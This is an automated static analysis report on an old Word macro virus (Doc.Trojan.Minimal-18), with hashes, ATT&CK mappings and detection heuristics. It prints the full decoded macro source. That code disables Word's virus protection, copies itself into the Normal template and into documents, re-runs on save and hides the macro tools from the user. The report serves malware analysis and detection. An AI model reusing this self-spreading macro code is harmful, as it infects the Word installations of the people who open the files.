Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5ca17d2705fd8036…

MALICIOUS

Office (OLE)

29.0 KB Created: 2000-08-23 02:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 310e2f20352babc4e0b653a706d92b85 SHA-1: 77beaf366022e98f09660e87dacaca0acccea915 SHA-256: 5ca17d2705fd8036de8325fa2be1717fe0c4b2ebbc7ddbb692dc01a08495612e
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and an AutoOpen macro, indicating an attempt to execute malicious code upon opening. The presence of the 'tot' macro and its use in AutoOpen suggests a mechanism for loading and potentially executing further stages. While the specific payload is not directly visible, the macro's structure and the ClamAV detection point towards a trojan.

Heuristics 4

  • ClamAV: Doc.Trojan.Minimal-18 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Minimal-18
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1776 bytes
SHA-256: de36d65f93065b63da96a8b802c9c4cbc49e957b478af1716e56e6e581091b38
Detection
ClamAV: Doc.Trojan.Minimal-18
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tot"
Sub AutoOpen(): On Error Resume Next: Application.EnableCancelKey = 0: Application.ShowVisualBasicEditor = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0: a = ActiveDocument.FullName: n = NormalTemplate.FullName: Application.OrganizerCopy Source:=a, Destination:=n, Name:="tot", Object:=wdOrganizerObjectProjectItems: NormalTemplate.Save: Application.OrganizerCopy Source:=n, Destination:=a, Name:="tot", Object:=wdOrganizerObjectProjectItems: ActiveDocument.Save: End Sub
Sub ToolsRecordMacroToggle(): End Sub
Sub ToolsRecordMacroStart(): End Sub
Sub FileSave(): AutoOpen: End Sub
Sub FileTemplates(): End Sub
Sub ToolsMacro(): End Sub
Sub ViewVBcode(): End Sub
Sub Organizer(): End Sub

'         MMM            MMMMMMMMM                 MM
'       MMMMMMMM     MMMMMMMMMMMMMMMM          MMMMMM
'        MMMMMMMMMMMMMMM/"""""""\MMMMMMMMMMMMMMMMMMMMM
'         MMMMMMMMMMMMMM\______/MMMMMMMMMMMMMMMMMMMMMM
'         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
'         MMMM      MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
'         MMM        MMMMMMMMMMMMM           MMMMMMMMMM
'         MMM        MMMMMMMMMMM    RUSSIA     MMMMMMMM
'          MM         MMMMMMMM               M  MMMMMMM
'          MM        MMMMMMMMM             MMM   MMMMMM
'                   MMMMMMMMMMMMMM      MMMMM    MMMMMM
'          MM      MMMMMMMMMMMMMMMMMMMMMMMM       MMMM
'         MMMMMMMMMMMMMMMMMMMMMMMMMMMMM           MMMM
'        MMMMMMMMMM                                MM

Open this report in the interactive analyzer, or submit your own file for analysis.